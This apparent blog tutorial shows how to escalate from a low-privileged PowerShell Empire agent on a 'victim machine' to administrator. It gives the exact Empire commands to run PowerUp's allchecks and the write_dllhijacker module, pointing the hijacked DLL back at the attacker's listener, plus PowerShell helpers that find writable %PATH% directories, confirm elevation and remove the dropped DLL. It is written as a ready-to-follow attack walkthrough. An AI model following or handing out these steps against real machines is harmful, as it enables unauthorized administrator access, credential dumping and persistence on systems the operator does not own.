So in one way or another, you have got your shell on the victim machine. Well done. After a quick ‘sysinfo’ you notice that you are not running as an administrator, so many of the modules you would like to use (credential dumping, for instance) are off limits because they need an elevated context. To get at the sensitive data and operations, you must escalate your privileges to an administrator account. But how do you do it?

PowerShell Empire is here to help you. It ships a whole set of privilege escalation modules under privesc/, including the PowerUp checks, which hunt for misconfigurations (weak service permissions, unquoted service paths, writable %PATH% directories, AlwaysInstallElevated and similar) and therefore work even on fully patched systems, and sherlock, which instead checks whether the host is missing patches for known local privilege escalation vulnerabilities. Note that mimikatz lives under the credentials/ modules: it is what you run after escalating, to dump credentials, not a way to escalate in itself.

In this article, we will assume that you already have a working PowerShell Empire agent running as a non-administrator user on the victim machine (our previous article covers how to get that initial agent).

Okay, enough theory, let’s get started. Interact with your existing agent:

agents

interact <agent name>

For this article we will be using the PowerUp modules. Because they look for configuration weaknesses rather than missing patches, they are the privilege escalation modules that succeed most often in our experience, and they are usually the first thing worth trying.

searchmodule powerup

You will see something like this:

[Screenshot: output of ‘searchmodule powerup’, listing PowerShell Empire’s PowerUp privilege escalation modules]

The result is the list of PowerShell Empire’s PowerUp privilege escalation modules. The last one, named ‘allchecks’, might catch your eye, and it should. This module runs every PowerUp check on the target machine in one go (service permissions and paths, %PATH% DLL hijacks, registry autoruns, AlwaysInstallElevated, leftover install files and so on). Let’s use this one:

usemodule privesc/powerup/allchecks

Let’s check whether it requires any additional configuration:

options

[Screenshot: ‘options’ output for the privesc/powerup/allchecks module]

Perfect! So as we can see, the module is ready to use as is. Let’s run it:

run

When it finishes, you will see the results of all the PowerUp checks:

[Screenshot: allchecks results, showing a potentially hijackable DLL path and its AbuseFunction]

As we can see, the output flags a potentially hijackable DLL: a directory in %PATH% that the current user can write to (the most common finding in our experience). Note the word ‘potentially’. PowerUp only tells you that the directory is writable; whether a privileged process actually searches it for a DLL that is not found earlier in the search order is what decides if the hijack pays off, so it is worth verifying the candidate before dropping anything on disk.
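To see what the %PATH% part of ‘allchecks’ is actually testing, here is an added example (our own illustration, not PowerUp’s or Empire’s code) that walks %PATH% in search order and probes each directory for real write access by creating and deleting a file, rather than trusting the ACL text. The function name and its PathString parameter are our own; it assumes you run it from a PowerShell session on the target as the same low-privileged user the agent runs as.

```powershell
# Added example: re-implement the writable-%PATH% check behind PowerUp's
# allchecks output so a candidate can be verified by hand. Not Empire code.
function Find-WritablePathDirectory {
    [CmdletBinding()]
    param(
        # Hypothetical parameter: the PATH string to inspect; defaults to the live one.
        [string]$PathString = $env:PATH
    )

    $index = 0
    foreach ($dir in ($PathString -split ';' | Where-Object { $_ })) {
        $index++
        if (-not (Test-Path -LiteralPath $dir -PathType Container)) {
            # A PATH entry pointing at a missing directory is not writable today,
            # but it is still interesting if the parent directory is.
            [pscustomobject]@{ Order = $index; Directory = $dir; Exists = $false; Writable = $false }
            continue
        }

        # Probe real write access: create a uniquely named file, then remove it.
        # Access-denied (and any other I/O error) simply means "not writable".
        $probe = Join-Path -Path $dir -ChildPath ('probe_{0}.tmp' -f [guid]::NewGuid())
        $writable = $false
        try {
            [IO.File]::WriteAllText($probe, '')
            $writable = $true
        } catch [UnauthorizedAccessException], [IO.IOException] {
            $writable = $false
        } finally {
            if (Test-Path -LiteralPath $probe) {
                Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
            }
        }

        # Order matters: the loader walks PATH left to right, so a writable
        # directory only wins for DLLs not found in an earlier entry (or in the
        # application, System32, System and Windows directories before PATH).
        [pscustomobject]@{ Order = $index; Directory = $dir; Exists = $true; Writable = $writable }
    }
}

# Usage: list only the entries the current user can write to, in search order.
Find-WritablePathDirectory | Where-Object Writable | Format-Table -AutoSize
```

If this prints nothing, the allchecks finding was probably a false positive for your user (for example a directory writable by a group the agent’s token does not carry), and the DLL hijack route is not worth pursuing.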

Now, how do we exploit it? The answer is very easy. For the AbuseFunctions PowerUp reports, there are matching PowerShell Empire modules under privesc/powerup/. Let’s find the one we need by searching for the keyword DLL:

searchmodule dll

As we can see, one of the results is write_dllhijacker. Sounds just like what we need. Let’s use it (the module name is exactly as listed, with no underscore between ‘dll’ and ‘hijacker’):

usemodule privesc/powerup/write_dllhijacker

Let’s see what options are required to run this module:

options

[Screenshot: ‘options’ output for the privesc/powerup/write_dllhijacker module, showing the DllPath and Listener settings]

As we can see, we need to set the DllPath (the AbuseFunction line in the allchecks output already tells you which path to use) and the Listener that the new agent should call back to (the name of the listener you already have running, most likely ‘http’), and then we can run the module. Let’s set these options and run it.

set DllPath <your DLL path>

set Listener http

run
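Before celebrating, check that the agent that calls back really holds an elevated token, and remember that the DLL you wrote is now an artefact on the target. The following is an added example (our own helper, not part of Empire or PowerUp) to run from a PowerShell session in the new agent’s context; Test-IsElevated and Remove-HijackDll are our own names, and DllPath is assumed to be the same path you set in the module.

```powershell
# Added example: verify the new session is elevated, then clean up the
# dropped DLL. Helper names are ours; this is not Empire or PowerUp code.
function Test-IsElevated {
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    # IsInRole only looks at group SIDs that are *enabled* in the token. A UAC
    # filtered (medium-integrity) token carries Administrators as deny-only,
    # so this returns $false for a non-elevated admin and $true only when the
    # process really runs with an elevated token.
    $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Remove-HijackDll {
    param(
        # Hypothetical parameter: the path you passed as DllPath to the module.
        [Parameter(Mandatory = $true)][string]$DllPath
    )
    if (-not (Test-Path -LiteralPath $DllPath)) {
        return "[-] $DllPath not found"
    }
    try {
        Remove-Item -LiteralPath $DllPath -Force -ErrorAction Stop
        "[+] Removed $DllPath"
    } catch {
        # The file stays locked while the hijacked process still has it mapped;
        # retry after that process or service has been stopped.
        "[!] $DllPath is still in use, remove it once the loading process exits: $($_.Exception.Message)"
    }
}

# Usage from inside the new agent:
'[*] Running as {0}; elevated: {1}' -f [Security.Principal.WindowsIdentity]::GetCurrent().Name, (Test-IsElevated)
Remove-HijackDll -DllPath 'C:\path\from\DllPath\wlbsctrl.dll'   # replace with your DllPath value
```

The Empire agent list marks elevated agents with an asterisk and ‘info’ shows the high_integrity flag, but running the check from inside the session is the definitive answer. Do the cleanup from the elevated agent, since the low-privileged agent may not be able to delete a file that a privileged process has loaded.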

And that’s it! Once the process or service that searches that %PATH% directory loads your DLL, you get a new PowerShell Empire agent running in an elevated context. If the new agent does not appear right away, that is usually because the DLL is only loaded when that process or service starts, so you may have to wait for a service restart, a reboot or a user logon. If you found this useful, please leave a comment or consider sharing this post. Good luck and happy hacking!